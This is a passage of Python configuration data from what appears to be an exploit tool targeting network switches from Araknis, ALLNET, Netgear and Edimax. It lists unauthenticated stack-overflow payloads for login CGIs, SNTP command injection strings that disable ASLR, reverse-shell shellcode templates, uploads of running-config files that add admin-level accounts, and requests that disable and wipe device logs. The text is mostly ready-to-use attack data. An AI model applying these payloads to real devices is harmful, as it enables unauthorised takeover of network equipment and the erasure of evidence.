'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Araknis': {
'vendor': 'Araknis Networks',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'stack':False,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'ALLNET_JSON': {
'vendor': 'ALLNET GmbH Computersysteme',
'model':'ALL-SG82xx',
'uri':'https://www.allnet.de/',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'2',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'&empty=1',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&target=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&target=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',
'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',
'sys_timeSettings_set_cmd_enable':'&sntp=1',
'sys_timeSettings_set_cmd_disable':'&sntp=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'ALLNET': {
'vendor': 'ALLNET GmbH Computersysteme',
'uri':'https://www.allnet.de/',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'httpuploadfirmware.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadfirmware.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'httpupload_runstart_cfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/tmp/startup-config',
'content_check':'/tmp/startup-config',
'vulnerable': True,
'safe': True
},
'version_upgrade.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (Frontend to "httpuploadfirmware.cgi")',
'uri':'/cgi-bin/version_upgrade.cgi',
'check_uri':'',
'content':'Firm Upgrade',
'content_check':'Firm Upgrade',
'vulnerable': True,
'safe': True
},
'factory_reset.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Reset device to factory default (PoC: Too dangerous to verify)',
'uri':'/cgi-bin/factory_reset.cgi',
'check_uri':'',
'content':'Too dangerous to verify',
'content_check':'dummy',
'vulnerable': True,
'safe': False
},
'sysinfo_config.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':False,
'description':'System basic information configuration (Frontend to "change_mac_addr_set.cgi")',
'uri':'/cgi-bin/sysinfo_config.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'"/cgi-bin/change_mac_addr_set',
'vulnerable': True,
'safe': True
},
'change_mac_addr_set.cgi': {
'description':'Stack overflow in "switch_type/sys_hardver" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/change_mac_addr_set.cgi',
'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'cmd=547',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':False,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Netgear': {
'vendor': 'NETGEAR Inc.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':True,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_settings',
'disable_query':'{"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_settings',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',
'clean_logfile_query':'{"":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',
'clean_logmem_query':'{"":{}}',
'vulnerable': False,
'safe': True
},
'verify': {
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': True
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'md5',
'content':'Content-Type\n\nconfig-file-header\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':True,
'log_settings_set':0x00,
'log_ramClear':0x00,
'log_fileClear':0x00,
'workaround':False,
'verify_uri':'',
'vulnerable': False,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',
'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',
'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',
'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',
'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',
'sys_timeSettings_set_SIGSEGV': True,
'sys_timeSntp_set':0x00,
'sys_timeSntpDel_set':0x00,
'sys_timeSettings_set':0x00,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'cgi':'set.cgi',
'START':0x00,
'STOP':0x00,
'usr_nop': 64,
'pwd_nop': 77,
'align': 3,
'stack':True,
'workaround':False,
'vulnerable': False,
'safe': True
},
},
},
'Edimax': {
'vendor': 'EDIMAX Technology Co., Ltd.',
'modulus_uri':'/cgi/get.cgi?cmd=home_login',
'info_leak':False,
'info_leak_JSON':True,
'info_leak_uri':'/cgi/get.cgi?cmd=home_login',
'xsid':False,
'xsid_uri':'/cgi/get.cgi?cmd=home_main',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'rsa',
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'query':'{"_ds=1&username=USERNAME&password=PASSWORD&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'/cgi/set.cgi?cmd=log_global',
'disable_query':'{"_ds=1&empty=1&_de=1":{}}',
'status':'/cgi/get.cgi?cmd=log_global',
'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logfile_query':'{"_ds=1&target=1&_de=1":{}}',
'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',
'clean_logmem_query':'{"_ds=1&target=0&_de=1":{}}',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httpuploadruncfg.cgi',
'check_uri':'/tmp/http_saverun_cfg',
'content':'/var/config/running-config',
'content_check':'/var/config/running-config',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi/httprestorecfg.cgi',
'check_uri':'/tmp/startup-config',
'content':'/mnt/startup-config',
'content_check':'/mnt/startup-config',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'file',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'/tmp/http_uploadfail',
'content':'Copy: Illegal software format',
'content_check':'Copy: Illegal software format',
'vulnerable': True,
'safe': True
},
'login.cgi': {
'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',
'authenticated': False,
'response':'file',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'check_uri':'/tmp/VUL.TXT',
'content':'{"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1":{}}',
'content_check':'1',
'vulnerable': True,
'safe': True
},
'set.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1":{}}',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
